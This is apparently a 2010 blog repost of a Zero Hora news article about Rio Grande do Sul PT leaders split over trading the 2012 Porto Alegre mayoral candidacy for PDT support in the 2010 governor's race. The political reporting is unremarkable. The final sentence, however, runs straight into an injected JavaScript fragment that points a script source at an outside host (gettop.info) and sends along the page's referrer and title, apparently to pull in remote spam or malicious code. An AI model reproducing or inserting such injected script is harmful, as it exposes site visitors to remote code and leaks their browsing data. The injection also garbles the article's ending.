ACORDO DE CACIQUES

Jan 05 2010
(0) Comments

Zero Hora – Porto Alegre, 5/1/2010

Negociação divide petistas

Defendida por um grupo de petistas, a proposta de abrir mão da cabeça de chapa na eleição para a prefeitura da Capital em 2012 em troca do apoio do PDT na disputa deste ano ao governo estadual dividiu líderes do partido.
Presidente eleito do PT gaúcho – com posse marcada para fevereiro –, o deputado estadual Raul Pont classificou a hipótese como uma “invenção inoportuna”. A ideia foi levantada pelo vereador Adeli Sell (PT), presidente eleito do diretório da Capital, e pelos deputados Paulo Pimenta e Adão Villaverde em reportagem de ZH de ontem. Pont criticou a posição dos colegas:

– A política não é troca de cargos. Eu ganho isso e tu ganhas aquilo. Não podemos ter esse grau de rebaixamento, de toma lá dá cá.

É preciso humildade, diz Jairo Jorge
Pont afirmou que o PT deseja formar uma aliança com PDT e PTB com base numa identidade comum, que já coloca os três partidos na base do governo Lula.
O vice-presidente do PT estadual, Cícero Balestro, também aposta nas afinidades políticas como forma de aproximar aliados à candidatura de Tarso Genro:
– As eleições de 2010 e 2012 são processos diferentes. Não podemos misturar. Precisamos montar um bloco de coesão programática.
Já o prefeito de Canoas, Jairo Jorge, disse que o PT tem a chance de criar um novo bloco político:
– Temos de ter humildade para buscar o melhor nome. Em 2012, com um novo campo político, o candidato pode ser José Fortunati (PDT), Manuela D’Ávila (PC do B), Beto Albuquerque (PSB) ou Sérgio Zambiasi (PTB). O que importa é construir juntos uma ação política.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;